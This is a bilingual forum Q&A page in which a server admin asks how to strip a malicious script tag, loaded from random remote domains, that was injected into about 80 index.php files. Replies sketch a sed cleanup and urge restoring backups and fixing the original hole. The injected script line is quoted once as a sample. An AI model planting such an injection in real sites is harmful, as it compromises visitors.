Linux命令行:编辑被黑客入侵的索引文件
不幸的是,我再次遇到 Linux Plesk 服务器上的一个被黑网站。虽然问题已通过更改 FTP 访问权限得到解决(归根结底是 PC 上著名的 Filezilla FTP 代码黑客攻击),但我很想知道如何编辑文件,因为可能需要一个多小时才能将站点恢复到最新备份我们已经做到了,我很高兴能更快地恢复上线。 黑客攻击相当简单:将 JavaScript 代码插入到站点中的许多 index*(似乎只有 index.php)文件中。 我正在寻找一种方法来批量编辑被黑的文件,因为我知道即使目标 JavaScript 代码是相同的,但它是从许多可能也被黑的网站调用的。因此,虽然我的合法索引文件过去以
<?php
它开头,但现在开始时,
<script type="text/javascript" src="http://(RANDOMDOMAINHERE)/facebook.php"></script><?php
由于该链包含一个变量,您能帮我找到一种可靠的方法来编辑所有已更改的索引文件(找到大约 80 个)吗? 我之前使用过 SED 替换,但这次要替换的链的一部分有所不同,所以我可以使用通配符吗? 致以最诚挚的问候,感谢您的光临!
I'm unfortunately once more dealing with a hacked site on a Linux Plesk server. While the issue is fixed with FTP access changed (it got down to the famous Filezilla FTP codes hack on a PC) I'd appreciate to know how to edit files as it may take over an hour to restore the site to the most recent backup we have, and I'd be glad to have it back online faster.
The hack is rather simple: a javascript code was inserted in many index* (only index.php it seems) files in the site.
I'm looking for a way to mass-edit the hacked files, knowing that even though the target javascript code is the same, it is called from a number of probably also hacked sites. So while my legitimate index file used to start with
<?php
it now starts like
<script type="text/javascript" src="http://(RANDOMDOMAINHERE)/facebook.php"></script><?php
As that chain contains a variable, could you help me find a sure-fire method to edit all the changed Index files (about 80 found) ?
I have used a SED replace before but this time part of the chain to replace varies, so could I use a wildcard ?
Best regards, thanks for shedding light !
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(3)
应该会产生奇迹
sed 命令
1(在第一行匹配)s#pattern#replacement#g(通过替换替换模式,而不是后者为空)^必须在行开头匹配。*\?接受任意长度的字符序列;但是,如果可以对整个模式进行多个匹配,则仅匹配它的最短可能变体干杯
Should do wonders
the sed command:
1(match in first line)s#pattern#replacement#g(replace pattern by replacement, not that the latter is empty)^must match at start of line.*\?accept arbitrary length of sequence of characters; however if more than one a match for the whole pattern could be made, only match the shortest possible variant of itCheers
我真诚地希望您实际上没有管理生产域。您应该通知用户,解决问题,让用户返回到最近没有问题的备份。
目前还不清楚还有什么被篡改过。
我很高兴我的 VPS 在其他地方!
I sincerely hope your not actually adminning a production domain. You should inform your users, get the problem fixed, offer the users to go back to a recent backup that hasn't got the problem.
There is no telling what else has been tampered with.
I'm glad my VPS is somewhere else!
在解决这个问题之前,我会修复跨端脚本漏洞,否则一切都将是徒劳的。完成后,对包含公共字符串的脚本块进行简单的搜索和替换就足够了。
I would fix the Cross side scripting exploit before this problem is addressed or it will all be in vain. When thats done a simple search and replace of blocks of script that contain a common string should be sufficient.